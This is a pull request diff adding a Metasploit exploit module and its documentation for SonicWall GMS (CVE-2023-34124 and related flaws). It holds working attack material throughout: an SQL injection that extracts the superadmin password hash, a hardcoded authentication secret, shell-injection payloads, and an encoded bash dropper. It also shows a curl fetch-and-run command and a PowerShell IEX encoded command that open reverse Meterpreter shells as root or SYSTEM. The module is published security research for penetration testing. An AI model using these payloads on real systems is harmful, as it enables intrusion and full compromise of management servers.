### PR TITLE
Sonicwall rce CVE-2023-34124

### DIFF
--- a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md
+++ b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md
@@ -1,0 +1,271 @@
+## Vulnerable Application
+
+This affects SonicWall GMS 9.3.2-SP1 and earlier. That's build 9.3.9320 and
+earlier (9.3.9330 is patched). You can get the software by creating a free
+account on https://mysonicwall.com. Getting a demo license is a big involved,
+but it should be roughly the following steps:
+
+* Create an account at: https://www.mysonicwall.com/
+* Download the Linux VM appliance or Windows EXE
+* Install the application with defaults
+* Visit the application in your browser
+* The default creds are admin/password, but at some point you'll need to log in with your mysonicwall.com account
+* Eventually you'll be asked the install a license
+* Go back to https://www.mysonicwall.com
+* On the left hand side menu go to "Product Mangement" -> "Trial Software"
+* Scroll down to "GMS" click on "Try Now"
+* Enter a "Friendly name" - this can be anything - click on "Try Now"
+* You should see a success message
+* Go to "My Products" on the left hand side (Note: this didn't load in Chrome in some cases)
+* Your license should now be listed here. You may need to click the table's refresh icon within the UI, not the browser refresh button
+* Click on the license and you'll get the serial number + auth code + etc. that you need
+* Enter those in your browser
+* Device should now be licensed
+
+## Verification Steps
+
+1. Install the application (see above)
+2. Start `msfconsole`
+3. Do `use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124`
+4. Set the appropriate `TARGET`, `RHOST`, `LHOST`, and possibly `FETCH_SRVHOST` (for Windows)
+5. Do `run`
+6. You should get meterpreter
+
+## Options
+
+### `TARGETURI` (default: `/`)
+
+The base path to the target application. The default (`/`) should almost always
+work.
+
+### `WritableDir`
+
+A writable directory on the target. We default to either `/tmp` for Linux or
+`%TEMP%` on Windows.
+
+### `AllowIncorrectPlatform`
+
+By default, we ensure that the platform in the `TARGET` and the platform that
+we detect are the same. If they are not, we fail out.
+
+If this is set to `true`, we trust that the `TARGET` is set appropriately and
+use that target OS for encoding the command.
+
+## Scenarios
+
+### Linux dropper
+
+This is the default target, and will work against the Linux appliance with
+its stripped-down environment. It writes a binary to `/tmp` (by default),
+executes it, and deletes it. No special configuration should be necessary,
+and you get `root` access:
+
+```
+msf6 > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.89
+RHOST => 10.0.0.89
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
+LHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
+[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
+[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
+[*] Sending SQL injection request to get the username/hash...
+[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Grabbing server hashing token...
+[*] Got the server-side token: 10638945083391156307247271263824
+[*] Generated client token: de3787d4ac2f5db099666e6467b11c38
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Linux detected!)
+[*] Encoding (Linux) payload
+[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.ctdtzpxv\\\\nf0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA\$\{PLUS\}gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoAAONRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp\$\{PLUS\}Wg8FSIXAeO3/5g\=\=\\\\n\=\=\=\=\ \|\ uudecode\ \;\ coproc\ /tmp/.ctdtzpxv\ \;\ rm\ /tmp/.ctdtzpxv
+[*] Attempting to execute the shell injection payload
+[+] Payload sent!
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 10.0.0.89
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.89:43566) at 2023-08-18 13:38:00 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
+### Windows fetch
+
+This is the best Windows target, and will work against installations on Windows
+that have the `curl.exe` utility. It fetches and executes a payload using
+encoded Powershell commands, granting `SYSTEM` access:
+
+```
+msf6 > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
+LHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.79
+RHOST => 10.0.0.79
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set FETCH_SRVHOST 10.0.0.227
+FETCH_SRVHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+
+[*] Command to run on remote host: curl -so hQwPyfWWi.exe http://10.0.0.227:8080/jmQsj96o2bA9WhizsOs40Q & start /B hQwPyfWWi.exe
+[*] Fetch Handler listening on 10.0.0.227:8080
+[*] HTTP server started
+[*] Adding resource /jmQsj96o2bA9WhizsOs40Q
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
+[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
+[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
+[*] Sending SQL injection request to get the username/hash...
+[.] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Grabbing server hashing token...
+[*] Got the server-side token: 33936314922891192454547809769777
+[*] Generated client token: e3a16584fcc8a8238c707300d8400917
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Windows detected!)
+[*] Encoding (Windows) command: curl -so hQwPyfWWi.exe http://10.0.0.227:8080/jmQsj96o2bA9WhizsOs40Q & start /B hQwPyfWWi.exe
+[*] Running shell command: powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(99,109,100,46,101,120,101,32,47,99,32,99,117,114,108,32,45,115,111,32,104,81,119,80,121,102,87,87,105,46,101,120,101,32,104,116,116,112,58,47,47,49,48,46,48,46,48,46,50,50,55,58,56,48,56,48,47,106,109,81,115,106,57,54,111,50,98,65,57,87,104,105,122,115,79,115,52,48,81,32,34,38,34,32,115,116,97,114,116,32,47,66,32,104,81,119,80,121,102,87,87,105,46,101,120,101)))
+[*] Client 10.0.0.79 requested /jmQsj96o2bA9WhizsOs40Q
+[*] Sending payload to 10.0.0.79 (curl/7.83.1)
+[+] Payload sent!
+[*] Sending stage (200774 bytes) to 10.0.0.79
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.79:52692) at 2023-08-18 14:04:08 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+### Windows command
+
+The Windows target can also run a generic Windows payload. You won't see the
+output, though.
+
+```
+msf6 > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set PAYLOAD cmd/windows/generic
+PAYLOAD => cmd/windows/generic
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.79
+RHOST => 10.0.0.79
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set CMD "echo hi > c:\\users\\administrator\\desktop\\test.txt"
+CMD => echo hi > c:\users\administrator\desktop\test.txt
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler true
+DisablePayloadHandler => true
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
+[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
+[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
+[*] Sending SQL injection request to get the username/hash...
+[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Grabbing server hashing token...
+[*] Got the server-side token: 35362425873079330798216049225958
+[*] Generated client token: e304c909a4e69b49608777910338b8ba
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Windows detected!)
+[*] Encoding (Windows) command: echo hi > c:\users\administrator\desktop\test.txt
+[*] Running shell command: powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(99,109,100,46,101,120,101,32,47,99,32,101,99,104,111,32,104,105,32,62,32,99,58,92,117,115,101,114,115,92,97,100,109,105,110,105,115,116,114,97,116,111,114,92,100,101,115,107,116,111,112,92,116,101,115,116,46,116,120,116)))
+[+] Payload sent!
+```
+
+Validate:
+
+```
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
+LHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set FETCH_SRVHOST 10.0.0.227
+FETCH_SRVHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE false
+VERBOSE => false
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] Sending SQL injection request to get the username/hash...
+[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Windows detected!)
+[*] Sending stage (200774 bytes) to 10.0.0.79
+[+] Payload sent!
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.79:52787) at 2023-08-18 14:13:11 -0700
+
+meterpreter > ls c:\\users\\administrator\\desktop\\test.txt
+100666/rw-rw-rw-  10  fil  2023-08-18 14:06:51 -0700  c:\users\administrator\desktop\test.txt
+```
+
+### Linux command
+
+I also added a target for a Linux command. It works by writing the command to
+a file then executing the file with the default shell (/bin/sh), which is
+basically the same as the Linux dropper.
+
+Like Windows, you won't see the output.
+
+```
+msf6 > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 2
+TARGET => 2
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.89
+RHOST => 10.0.0.89
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set CMD 'touch /tmp/iassureyouiexecuted'
+CMD => touch /tmp/iassureyouiexecuted
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+
+[+] touch /tmp/iassureyouiexecuted
+[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
+[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
+[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
+[*] Sending SQL injection request to get the username/hash...
+[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Grabbing server hashing token...
+[*] Got the server-side token: 32069016763622082907123286615890
+[*] Generated client token: 6988cba8e0f09a4289075c1c3f3d84a2
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Linux detected!)
+[*] Encoding (Linux) payload
+[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.whhkjilf\\\\ndG91Y2ggL3RtcC9pYXNzdXJleW91aWV4ZWN1dGVk\\\\n\=\=\=\=\ \|\ uudecode\ \;\ coproc\ /tmp/.whhkjilf\ \;\ rm\ /tmp/.whhkjilf
+[*] Attempting to execute the shell injection payload
+[+] Payload sent!
+```
+
+To validate:
+
+```
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 0
+TARGET => 0
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227                         
+LHOST => 10.0.0.227
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE false
+VERBOSE => false
+msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.227:4444 
+[*] Sending SQL injection request to get the username/hash...
+[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
+[*] Attempting to authenticate with the client token + password hash...
+[+] Successfully logged in as admin (Linux detected!)
+[*] Attempting to execute the shell injection payload
+[*] Sending stage (3045380 bytes) to 10.0.0.89
+[+] Payload sent!
+[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.89:43883) at 2023-08-18 14:11:57 -0700
+
+meterpreter > ls /tmp/iassure*
+Listing: /tmp/iassure*
+======================
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100640/rw-r-----  0     fil   2023-08-18 14:10:21 -0700  iassureyouiexecuted
+```

--- a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md
+++ b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md
@@ -43,7 +43,7 @@ work.
 A writable directory on the target. We default to either `/tmp` for Linux or
 `%TEMP%` on Windows.
 
-### `AllowIncorrectPlatform`
+### `ForceExploit`
 
 By default, we ensure that the platform in the `TARGET` and the platform that
 we detect are the same. If they are not, we fail out.

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -222,13 +222,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_post' => {
         'action' => 'login',
-        'skipSessionCheck' => '0',
-        'needPwdChange' => '0',
         'clientHash' => client_hash,
-        'password' => hash,
-        'applianceUser' => username,
-        'appliancePassword' => 'Nice Try',
-        'ctlTimezoneOffset' => '0'
+        'applianceUser' => username
       }
     })
 

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -260,8 +260,8 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # We discovered that we could encode the command as integers, then use
     # powershell to decode + execute it, so that's what this does.
-    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
-    cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"
+    encoded_cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
+    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{encoded_cmd.bytes.join(',')})))"
 
     # Run the command
     vprint_status("Running shell command: #{cmd}")
@@ -273,7 +273,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'action' => 'file_system',
         'task' => 'search',
         'searchFolder' => 'C:\\GMSVP\\etc\\',
-        'searchFilter' => "|#{cmd}| rem "
+        'searchFilter' => "|#{encoded_cmd}| rem "
       }
     })
 

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -103,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options([
       # This varies by target, so don't define the default here
       OptString.new('WritableDir', [true, 'A directory where we can write files']),
-      OptBool.new('AllowIncorrectPlatform', [true, "Don't validate the platform before attempting the exploit", false])
     ])
   end
 
@@ -119,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
 
     # Ensure we're hitting plausible software
-    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite .*)</
+    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</
 
     # Otherwise, probably safe?
     CheckCode::Safe('Does not appear to be running SonicWall GMS')
@@ -162,10 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => uri,
       'headers' => {
-        'Auth' => '{"user": "system", "hash": "' + token + '"}',
-        'Accept-Encoding' => 'gzip;q=1.0,deflate;q=0.6,identity;q=0.3',
-        'Accept' => '*/*',
-        'Connection' => 'close'
+        'Auth' => '{"user": "system", "hash": "' + token + '"}'
       }
     )
 
@@ -274,7 +270,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
       'keep_cookies' => true,
       'vars_post' => {
-        'num' => '3232150',
+        'num' => rand(1..999999),
         'action' => 'file_system',
         'task' => 'search',
         'item' => 'application_log',
@@ -310,15 +306,31 @@ class MetasploitModule < Msf::Exploit::Remote
     # put it back! We also can't use quotes, so we have to do a mountain of
     # escaping instead. The default shell is also /bin/sh, so we need to run
     # bash explicitly for the `$()` substitutions to work.
-    #
-    # The summary is:
-    # * Use bash so we have access to $() (we can't use backticks)
-    # * Use uudecode to get a + into the $PLUS variable (using base64)
-    # * Generate a base64 payload, but replace + with ${PLUS} to bypass filter
-    # * Decode the payload into our payload file
-    # * Run the payload in the background with coproc
-    # * Delete the payload file
-    cmd = "bash -c #{Shellwords.escape("PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n==== | uudecode ; coproc #{Shellwords.escape(payload_file)} ; rm #{payload_file}")}"
+    cmd = [
+      # Build a command that runs in bash (but don't use quotes!)
+      'bash -c ',
+
+      # Escape all this for bash
+      Shellwords.escape([
+        # Use `uudecode` to get a '+' into a variable
+        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",
+
+        # Build a new uuencode file (encoded in base64) with the payload
+        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",
+
+        # Encode the payload as base64, but replace + with a variable
+        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",
+
+        # Pipe into uudecode
+        '==== | uudecode;',
+
+        # Run in the background with coproc
+        "coproc #{Shellwords.escape(payload_file)};",
+
+        # Delete the payload file
+        "rm #{payload_file}"
+      ].join)
+    ].join
 
     # Run it!
     vprint_status("Encoded shell command: #{cmd}")
@@ -328,14 +340,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
       'keep_cookies' => true,
       'vars_post' => {
-        'num' => '3232150',
+        'num' => rand(1..999999),
         'action' => 'file_system',
         'task' => 'search',
         'item' => 'application_log',
-        'criteria' => '*',
-        'width' => '500',
         'searchFolder' => '/opt/GMSVP/etc/',
-        'searchFilter' => "appliance.jar;#{cmd};echo "
+        'searchFilter' => "appliance.jar;#{cmd}#"
       }
     })
 
@@ -354,7 +364,7 @@ class MetasploitModule < Msf::Exploit::Remote
     detected_platform = authenticate(username, hash)
 
     # Sanity-check the target
-    if !datastore['AllowIncorrectPlatform'] && !target.platform.platforms.include?(detected_platform)
+    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)
       fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set AllowIncorrectPlatform to true)")
     end
 

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -13,6 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)
   SECRET_KEY = '?~!@#$%^^()'
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
@@ -48,8 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :dropper,
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-                'WritableDir' => '/tmp',
-                'DisablePayloadHandler' => false
+                'WritableDir' => '/tmp'
               }
             }
           ],
@@ -61,8 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',
-                'WritableDir' => '%TEMP%',
-                'DisablePayloadHandler' => false
+                'WritableDir' => '%TEMP%'
               }
             }
           ],
@@ -73,8 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_CMD],
               'Type' => :cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/generic',
-                'DisablePayloadHandler' => true
+                'PAYLOAD' => 'cmd/unix/generic'
               }
             }
           ],
@@ -168,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Sanity checks
     fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
     fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200
-    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.nil?
+    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?
 
     # This field has the SQL injection response
     hash = res.get_json_document['alias']
@@ -273,8 +271,8 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     # This doesn't work, because our payload blocks and it eventually fails
-    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.nil?
-    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res&.body&.include?('invalid contents found')
+    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?
+    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')
 
     print_good('Payload sent!')
   end
@@ -339,8 +337,8 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     # This doesn't work, because our payload blocks and it eventually fails
-    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.nil?
-    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res&.body&.include?('invalid contents found')
+    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?
+    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')
 
     print_good('Payload sent!')
   end
@@ -354,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Sanity-check the target
     if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)
-      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set AllowIncorrectPlatform to true)")
+      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")
     end
 
     # Generate a payload based on the target type
@@ -362,7 +360,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :cmd
       my_payload = payload.encoded
     when :dropper
-      my_payload = generate_payload_exe(code: payload.encoded)
+      my_payload = generate_payload_exe
     else
       fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")
     end

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -358,6 +358,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set AllowIncorrectPlatform to true)")
     end
 
+    # Generate a payload based on the target type
     case target['Type']
     when :cmd
       my_payload = payload.encoded

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -255,8 +255,8 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # We discovered that we could encode the command as integers, then use
     # powershell to decode + execute it, so that's what this does.
-    encoded_cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
-    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{encoded_cmd.bytes.join(',')})))"
+    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
+    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"
 
     # Run the command
     vprint_status("Running shell command: #{cmd}")

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -270,14 +270,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
       'keep_cookies' => true,
       'vars_post' => {
-        'num' => rand(1..999999),
         'action' => 'file_system',
         'task' => 'search',
-        'item' => 'application_log',
-        'criteria' => '*',
-        'width' => '500',
         'searchFolder' => 'C:\\GMSVP\\etc\\',
-        'searchFilter' => "appliance.jar|#{cmd}| echo "
+        'searchFilter' => "|#{cmd}| rem "
       }
     })
 
@@ -340,12 +336,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
       'keep_cookies' => true,
       'vars_post' => {
-        'num' => rand(1..999999),
         'action' => 'file_system',
         'task' => 'search',
-        'item' => 'application_log',
         'searchFolder' => '/opt/GMSVP/etc/',
-        'searchFilter' => "appliance.jar;#{cmd}#"
+        'searchFilter' => ";#{cmd}#"
       }
     })
 

--- a/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
+++ b/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
@@ -1,0 +1,379 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  # We can actually use the title to identify which platform we're on
+  TITLE_WINDOWS = 'SonicWall Universal Management Host'
+  TITLE_LINUX = 'SonicWall Universal Management Appliance'
+
+  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)
+  SECRET_KEY = '?~!@#$%^^()'
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sonicwall',
+        'Description' => %q{
+          This module exploits a series of vulnerabilities - including auth
+          bypass, SQL injection, and shell injection - to obtain remote code
+          execution on SonicWall GMS versions <= 9.9.9320.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis
+          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],
+          [ 'CVE', '2023-34124'],
+          [ 'CVE', '2023-34133'],
+          [ 'CVE', '2023-34132'],
+          [ 'CVE', '2023-34127']
+        ],
+        'Privileged' => true,
